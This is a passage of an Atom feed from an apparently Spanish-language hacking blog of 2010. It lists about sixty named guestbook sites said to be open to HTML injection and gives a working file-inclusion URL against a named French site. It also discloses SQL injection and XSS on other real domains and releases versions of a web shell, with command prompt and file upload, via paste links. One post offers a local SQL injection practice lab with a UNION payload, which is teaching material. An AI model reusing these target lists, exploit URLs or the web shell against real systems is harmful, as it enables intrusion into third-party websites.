/&gt;6 &lt;a class="bbc_link new_win" href="http://las4puertas.com/phpbook/" target="_blank"&gt;http://las4puertas.com/phpbook/&lt;/a&gt;&lt;br /&gt;7 &lt;a class="bbc_link new_win" href="http://www.ccilaloma.org/gbookphp/" target="_blank"&gt;http://www.ccilaloma.org/gbookphp/&lt;/a&gt;&lt;br /&gt;8 &lt;a class="bbc_link new_win" href="http://sociedadcrvel.my-place.us/libro" target="_blank"&gt;http://sociedadcrvel.my-place.us/libro&lt;/a&gt;&lt;br /&gt;9 &lt;a class="bbc_link new_win" href="http://lamontanaesmireino.es/libro/" target="_blank"&gt;http://lamontanaesmireino.es/libro/&lt;/a&gt; &lt;br /&gt;10 &lt;a class="bbc_link new_win" href="http://www.llanolasmajadas.info/libro-de-visitas/" target="_blank"&gt;http://www.llanolasmajadas.info/libro-de-visitas/&lt;/a&gt;&lt;br /&gt;11 &lt;a class="bbc_link new_win" href="http://www.llanolasmajadas.info/libro-de-visitas/" target="_blank"&gt;http://www.llanolasmajadas.info/libro-de-visitas/&lt;/a&gt;&lt;br /&gt;12 &lt;a class="bbc_link new_win" href="http://porguate.org/visitantes/" target="_blank"&gt;http://porguate.org/visitantes/&lt;/a&gt;&lt;br /&gt;13 &lt;a class="bbc_link new_win" href="http://www.pormi.net/hornos/foro-hornos/" target="_blank"&gt;http://www.pormi.net/hornos/foro-hornos/&lt;/a&gt;&lt;br /&gt;14 &lt;a class="bbc_link new_win" href="http://www.wwwboutiqe.com/guestbook/" target="_blank"&gt;http://www.wwwboutiqe.com/guestbook/&lt;/a&gt;&lt;br /&gt;15 &lt;a class="bbc_link new_win" href="http://www.margina2.com/guestbook/" target="_blank"&gt;http://www.margina2.com/guestbook/&lt;/a&gt;&lt;br /&gt;16 &lt;a class="bbc_link new_win" href="http://callemania.com/libro" target="_blank"&gt;http://callemania.com/libro&lt;/a&gt;&lt;br /&gt;17 &lt;a class="bbc_link new_win" href="http://www.centrodemedicinaregenerativa.com/testimonios" target="_blank"&gt;http://www.centrodemedicinaregenerativa.com/testimonios&lt;/a&gt;&lt;br /&gt;18 &lt;a class="bbc_link new_win" href="http://www.metapanecos.com/libros/" target="_blank"&gt;http://www.metapanecos.com/libros/&lt;/a&gt;&lt;br /&gt;19 &lt;a class="bbc_link new_win" href="http://www.mucuweb.com/debachiller/" target="_blank"&gt;http://www.mucuweb.com/debachiller/&lt;/a&gt;&lt;br /&gt;20 &lt;a class="bbc_link new_win" href="http://www.debodael23dejunio.com/guestbook/index.php" target="_blank"&gt;http://www.debodael23dejunio.com/guestbook/index.php&lt;/a&gt;&lt;br /&gt;21 &lt;a class="bbc_link new_win" href="http://hectorrrr.byethost10.com/visitas/" target="_blank"&gt;http://hectorrrr.byethost10.com/visitas/&lt;/a&gt;&lt;br /&gt;22 &lt;a class="bbc_link new_win" href="http://criaderovonosten.com/librovis/index.php" target="_blank"&gt;http://criaderovonosten.com/librovis/index.php&lt;/a&gt;&lt;br /&gt;23 &lt;a class="bbc_link new_win" href="http://www.marcoylulatango.cl/guestbook/index.php" target="_blank"&gt;http://www.marcoylulatango.cl/guestbook/index.php&lt;/a&gt;&lt;br /&gt;24 &lt;a class="bbc_link new_win" href="http://www.pjtlalnepantla.org/Site/librovisitas" target="_blank"&gt;http://www.pjtlalnepantla.org/Site/librovisitas&lt;/a&gt;&lt;br /&gt;25 &lt;a class="bbc_link new_win" href="http://www.adatalca.cl/guestbook/" target="_blank"&gt;http://www.adatalca.cl/guestbook/&lt;/a&gt;&lt;br /&gt;26 &lt;a class="bbc_link new_win" href="http://www.djdemonk.com/guestbook/index.php" target="_blank"&gt;http://www.djdemonk.com/guestbook/index.php&lt;/a&gt;&lt;br /&gt;27 &lt;a class="bbc_link new_win" href="http://www.archivoswebmdp.com.ar/mensajes/terminacion/" target="_blank"&gt;http://www.archivoswebmdp.com.ar/mensajes/terminacion/&lt;/a&gt;&lt;br /&gt;28 &lt;a class="bbc_link new_win" href="http://www.promojdelgadom.com/guestbook/index.php" target="_blank"&gt;http://www.promojdelgadom.com/guestbook/index.php&lt;/a&gt;&lt;br /&gt;29 &lt;a class="bbc_link new_win" href="http://www.1en1.com.mx/herbook/index.php" target="_blank"&gt;http://www.1en1.com.mx/herbook/index.php&lt;/a&gt;&lt;br /&gt;30 &lt;a class="bbc_link new_win" href="http://www.cabdn.com/libro/index.php" target="_blank"&gt;http://www.cabdn.com/libro/index.php&lt;/a&gt;&lt;br /&gt;31 &lt;a class="bbc_link new_win" href="http://www.radiosatelitepauza.com/Libro/" target="_blank"&gt;http://www.radiosatelitepauza.com/Libro/&lt;/a&gt;&lt;br /&gt;32 &lt;a class="bbc_link new_win" href="http://www.larosalia.com/comentarios/index.php" target="_blank"&gt;http://www.larosalia.com/comentarios/index.php&lt;/a&gt;&lt;br /&gt;33 &lt;a class="bbc_link new_win" href="http://tajovino.com/guestbook/index.php" target="_blank"&gt;http://tajovino.com/guestbook/index.php&lt;/a&gt;&lt;br /&gt;34 &lt;a class="bbc_link new_win" href="http://www.margaritaadventure.com/es/guestbook/index.php" target="_blank"&gt;http://www.margaritaadventure.com/es/guestbook/index.php&lt;/a&gt;&lt;br /&gt;35 &lt;a class="bbc_link new_win" href="http://arturomareles.com/guestbook/index.php" target="_blank"&gt;http://arturomareles.com/guestbook/index.php&lt;/a&gt;&lt;br /&gt;36 &lt;a class="bbc_link new_win" href="http://www.alasparalamente.com.ar/libro/index.php" target="_blank"&gt;http://www.alasparalamente.com.ar/libro/index.php&lt;/a&gt;&lt;br /&gt;37 &lt;a class="bbc_link new_win" href="http://www.ababuj.com/guestbook1/index.php" target="_blank"&gt;http://www.ababuj.com/guestbook1/index.php&lt;/a&gt;&lt;br /&gt;38 &lt;a class="bbc_link new_win" href="http://arturomareles.com/guestbook/index.php" target="_blank"&gt;http://arturomareles.com/guestbook/index.php&lt;/a&gt;&lt;br /&gt;39 &lt;a class="bbc_link new_win" href="http://www.entreceja.com.ar/guestbook/index.php" target="_blank"&gt;http://www.entreceja.com.ar/guestbook/index.php&lt;/a&gt;&lt;br /&gt;40 &lt;a class="bbc_link new_win" href="http://www.estiloitaliano.altervista.org/guestbook" target="_blank"&gt;http://www.estiloitaliano.altervista.org/guestbook&lt;/a&gt;&lt;br /&gt;41 &lt;a class="bbc_link new_win" href="http://www.aeromodelistasdechile.cl/libro" target="_blank"&gt;http://www.aeromodelistasdechile.cl/libro&lt;/a&gt;&lt;br /&gt;42 &lt;a class="bbc_link new_win" href="http://launicaruta.com.ar/guestbook" target="_blank"&gt;http://launicaruta.com.ar/guestbook&lt;/a&gt;&lt;br /&gt;43 &lt;a class="bbc_link new_win" href="http://www.dmontaje.com.ar/consultas/" target="_blank"&gt;http://www.dmontaje.com.ar/consultas/&lt;/a&gt;&lt;br /&gt;44 &lt;a class="bbc_link new_win" href="http://www.anitapub.com/lv/" target="_blank"&gt;http://www.anitapub.com/lv/&lt;/a&gt;&lt;br /&gt;45 &lt;a class="bbc_link new_win" href="http://diegocarames.com.ar/guestbook" target="_blank"&gt;http://diegocarames.com.ar/guestbook&lt;/a&gt;&lt;br /&gt;46 &lt;a class="bbc_link new_win" href="http://www.iglesiavida-abundante.org/guestbook" target="_blank"&gt;http://www.iglesiavida-abundante.org/guestbook&lt;/a&gt;&lt;br /&gt;47 &lt;a class="bbc_link new_win" href="http://www.killermind.com.ar/gestbook" target="_blank"&gt;http://www.killermind.com.ar/gestbook&lt;/a&gt;&lt;br /&gt;48 &lt;a class="bbc_link new_win" href="http://www.paranoolvidar.com/registro" target="_blank"&gt;http://www.paranoolvidar.com/registro&lt;/a&gt;&lt;br /&gt;49 &lt;a class="bbc_link new_win" href="http://fotoshop-bahia.com/comentarios" target="_blank"&gt;http://fotoshop-bahia.com/comentarios&lt;/a&gt;&lt;br /&gt;50 &lt;a class="bbc_link new_win" href="http://www.odinn.com.ar/guestbook" target="_blank"&gt;http://www.odinn.com.ar/guestbook&lt;/a&gt;&lt;br /&gt;51 &lt;a class="bbc_link new_win" href="http://www.promojdelgadom.com/guestbook" target="_blank"&gt;http://www.promojdelgadom.com/guestbook&lt;/a&gt;&lt;br /&gt;52 &lt;a class="bbc_link new_win" href="http://www.martinrebechi.com.ar/libro/" target="_blank"&gt;http://www.martinrebechi.com.ar/libro/&lt;/a&gt;&lt;br /&gt;53 &lt;a class="bbc_link new_win" href="http://www.cabrivadavia.com.ar/guestbook" target="_blank"&gt;http://www.cabrivadavia.com.ar/guestbook&lt;/a&gt;&lt;br /&gt;54 &lt;a class="bbc_link new_win" href="http://02dd5f2.netsolhost.com/advguestbook1" target="_blank"&gt;http://02dd5f2.netsolhost.com/advguestbook1&lt;/a&gt;&lt;br /&gt;55 &lt;a class="bbc_link new_win" href="http://agmeruruguay.com.ar/comunicandonos/" target="_blank"&gt;http://agmeruruguay.com.ar/comunicandonos/&lt;/a&gt;&lt;br /&gt;56 &lt;a class="bbc_link new_win" href="http://alperenquen.com/guestbook" target="_blank"&gt;http://alperenquen.com/guestbook&lt;/a&gt;&lt;br /&gt;57 &lt;a class="bbc_link new_win" href="http://poemasycanciones.com/guestbook/guestbook/" target="_blank"&gt;http://poemasycanciones.com/guestbook/guestbook/&lt;/a&gt;&lt;br /&gt;58 &lt;a class="bbc_link new_win" href="http://www.raulseleccion.com/advancedguestbook/" target="_blank"&gt;http://www.raulseleccion.com/advancedguestbook/&lt;/a&gt;&lt;br /&gt;59 &lt;a class="bbc_link new_win" href="http://www.losamosdelcamino.com.mx/lvisitas" target="_blank"&gt;http://www.losamosdelcamino.com.mx/lvisitas&lt;/a&gt;&lt;br /&gt;60 &lt;a class="bbc_link new_win" href="http://www.fverzaoriente.com/libro" target="_blank"&gt;http://www.fverzaoriente.com/libro&lt;/a&gt;&lt;br /&gt;61 &lt;a class="bbc_link new_win" href="http://tropicalisima.fm/guestbook/" target="_blank"&gt;http://tropicalisima.fm/guestbook/&lt;/a&gt;&lt;br /&gt;62 &lt;a class="bbc_link new_win" href="http://www.tunamagisterio.com/libroVisitas3" target="_blank"&gt;http://www.tunamagisterio.com/libroVisitas3&lt;/a&gt;&lt;br /&gt;63 &lt;a class="bbc_link new_win" href="http://laplazadellimon.net/sitebuilder" target="_blank"&gt;http://laplazadellimon.net/sitebuilder&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a class="bbc_link new_win" href="http://futboldelaliga.com.ar/libro" target="_blank"&gt;&lt;/a&gt;&lt;br /&gt;No esta de mas aclarar que fueron encontradas por mi buen amigo &lt;a href="http://foro.portalhacker.net/index.php?action=profile;u=282466"&gt;Sthefano02&lt;/a&gt; y &lt;a href="http://artehack.net/foro/index.php?action=profile;u=1"&gt;Alexmanycool&lt;/a&gt;&lt;br /&gt;&lt;a class="bbc_link new_win" href="http://futboldelaliga.com.ar/libro" target="_blank"&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-4575969362253421216?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/4575969362253421216/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/libros-de-visita-vulnerables-html.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/4575969362253421216'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/4575969362253421216'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/libros-de-visita-vulnerables-html.html' title='Libros de visita vulnerables a HTML Injection'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-1579864960475277398</id><published>2010-08-21T16:07:00.000-07:00</published><updated>2010-08-21T16:07:00.120-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='HRiskTs'/><category scheme='http://www.blogger.com/atom/ns#' term='K0D4K'/><title type='text'>K0DAK Web Sh33LL! (1.2)</title><content type='html'>Hola gente, les dejo en su poder la version 1.2 de K0D4K Web Sh33LL!, esta version, trae incorporado una Admin Panel finder y trae corregido un bug del UPLOAD y el bug de la prompt de comandos.. Aca el code :)&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;a href="http://pastebin.com/uvGuJpRc"&gt;Code :)&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img69.imageshack.us/img69/1643/68088183.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="480" src="http://img69.imageshack.us/img69/1643/68088183.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Saludos&lt;br /&gt;&lt;div style="text-align: right;"&gt; &lt;b&gt;&lt;span style="color: red;"&gt;Dr [F]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-1579864960475277398?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/1579864960475277398/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/k0dak-web-sh33ll-12_21.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1579864960475277398'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1579864960475277398'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/k0dak-web-sh33ll-12_21.html' title='K0DAK Web Sh33LL! (1.2)'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-9123754536437829813</id><published>2010-08-19T21:13:00.000-07:00</published><updated>2010-08-20T12:56:29.497-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='L.F.I'/><category scheme='http://www.blogger.com/atom/ns#' term='HRiskTs'/><title type='text'>LFI |  www.fhpr2a.fr/portail</title><content type='html'>Vulnerabilidad de tipo L.F.I encontrada en www.fhpr2a.fr/&lt;br /&gt;Esta vulnerabilidad de encuentra en la parte doc.php que nos permite ver archivos alojados en el mismo servidor, variable vulnerable:&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;http://www.fhpr2a.fr/portail/doc.php?file=&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;Ej: &lt;b&gt;http://www.fhpr2a.fr/portail/doc.php?file=../habillage/global.css.php &lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Saludos&lt;b&gt;&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt; Dr [F]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-9123754536437829813?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/9123754536437829813/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/k0dak-web-sh33ll-12.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/9123754536437829813'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/9123754536437829813'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/k0dak-web-sh33ll-12.html' title='LFI |  www.fhpr2a.fr/portail'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-8702799875429234619</id><published>2010-08-19T20:11:00.000-07:00</published><updated>2010-08-19T20:55:59.891-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Labs'/><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='Sqli'/><title type='text'>Sqli Lab</title><content type='html'>Hola, les vengo a dejar una aplicacion vulnerable a Sql injection para que puedan ver y practicar a nivel local para no ir tumbando o defaceando servidores web.. (eso no es bien visto en este mundo), sin mas preambulo, los codes :)&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;&lt;a href="http://pastebin.com/puTNSexa"&gt;Code vulnerable&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;Guarden eso en un archivo PHP y creen la siguiente tabla:&lt;br /&gt;&lt;br /&gt;&lt;div style="background-color: #444444;"&gt;create table users (&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;id int(10) unsigned auto_increment,&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;name varchar(25),&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;password varchar(40),&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;country varchar(30),&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;primary key(id)&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;);&lt;/div&gt;&lt;br /&gt;Bueno, esa es la estructura de la tabla y listo ya podemos ingresar nuestra consulta, creo que es mas que obvio que seria en la variable id no ¿?&lt;br /&gt;&lt;br /&gt;una consulta podria ser asi:&lt;br /&gt;&lt;br /&gt;http://localhost/la.php?id=-1+union+all+select+1,table_name,3,4+from+information_schema.tables+limit+30,1--&lt;br /&gt;&lt;br /&gt;Saludos :)&lt;br /&gt;&lt;div style="color: red; text-align: right;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Dr [F]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;&lt;span style="background-color: #999999;"&gt;&lt;span style="background-color: #444444;"&gt;&lt;span style="background-color: #444444;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #444444;"&gt;&lt;span style="background-color: #999999;"&gt;&lt;span style="background-color: #444444;"&gt;&lt;span style="background-color: #444444;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-8702799875429234619?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/8702799875429234619/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/sqli-lab.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/8702799875429234619'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/8702799875429234619'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/sqli-lab.html' title='Sqli Lab'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-1393363343345899307</id><published>2010-08-16T19:06:00.000-07:00</published><updated>2010-08-16T19:06:56.052-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='HRiskTs'/><category scheme='http://www.blogger.com/atom/ns#' term='Sqli'/><title type='text'>SQLi | www.kanco.org</title><content type='html'>Vulnerabilidad tipo Sqli encontrada en &lt;span style="background-color: white; color: red;"&gt;&lt;a href="http://www.kanco.org/"&gt;www.kanco.org&lt;/a&gt; &lt;span style="color: black;"&gt;variable vulnerable:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;div style="text-align: center;"&gt;&lt;span style="background-color: white; color: red;"&gt;&lt;b&gt;http://www.kanco.org/news.php?NoticeID=' &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="background-color: white; color: red;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Fecha de reporte al Administrador:&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Dia: Lunes 16/8&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Hora: 23:00&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Medio de comunicacion: E-mail&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img843.imageshack.us/img843/4580/75954938.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://img843.imageshack.us/img843/4580/75954938.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-1393363343345899307?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/1393363343345899307/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/sqli-wwwkancoorg.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1393363343345899307'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1393363343345899307'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/sqli-wwwkancoorg.html' title='SQLi | www.kanco.org'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-6549052955887448173</id><published>2010-08-14T14:14:00.000-07:00</published><updated>2010-08-15T17:10:44.402-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='K0D4K'/><title type='text'>K0DAK Web Sh33LL! (1.1)</title><content type='html'>Buenas :). Aqui les dejo la segunda version de &lt;span style="color: red;"&gt;K0D4K Web Sh33LL!&lt;/span&gt;, esta segunda version, posee un Upload de archivos al servidor y depaso se le arreglaron las vulnerabilidades de tipo XSS que se habian encontrado.&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://pastebin.com/J2W65m4i"&gt;http://pastebin.com/J2W65m4i&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Archivo para descargar:&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://www.megaupload.com/?d=4Z2JPZ0I"&gt;http://www.megaupload.com/?d=4Z2JPZ0I&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;El reportador de los bugs fue Shell Root. Gracias Alex &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-6549052955887448173?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/6549052955887448173/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/k0dak-web-sh33ll-11.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/6549052955887448173'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/6549052955887448173'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/k0dak-web-sh33ll-11.html' title='K0DAK Web Sh33LL! (1.1)'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-4684159412596544420</id><published>2010-08-14T13:11:00.000-07:00</published><updated>2010-08-14T13:11:51.704-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='HRiskTs'/><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><title type='text'>XSS | www.ferroweb.com.ar</title><content type='html'>Vulnerabilidad de tipo XSS encontrada en www.ferroweb.com.ar&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img228.imageshack.us/img228/1995/ferrov.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://img228.imageshack.us/img228/1995/ferrov.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;&lt;div style="text-align: right;"&gt; &lt;b&gt;&lt;span style="color: red;"&gt;Dr [F]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-4684159412596544420?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/4684159412596544420/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/xss-wwwferrowebcomar.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/4684159412596544420'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/4684159412596544420'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/xss-wwwferrowebcomar.html' title='XSS | www.ferroweb.com.ar'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-8487308230169757097</id><published>2010-08-11T01:11:00.000-07:00</published><updated>2010-08-11T01:12:13.966-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PHP'/><category scheme='http://www.blogger.com/atom/ns#' term='Mysql'/><title type='text'>Funcion para conectar a MySql</title><content type='html'>Hola, aca les dejo el codigo de una pequeña pero util funcion que lo que hace es permitir la conexion a una base de datos de tipo MySql, en esta, se pasan 4 parametros. host,user,pass,database.&lt;br /&gt;&lt;br 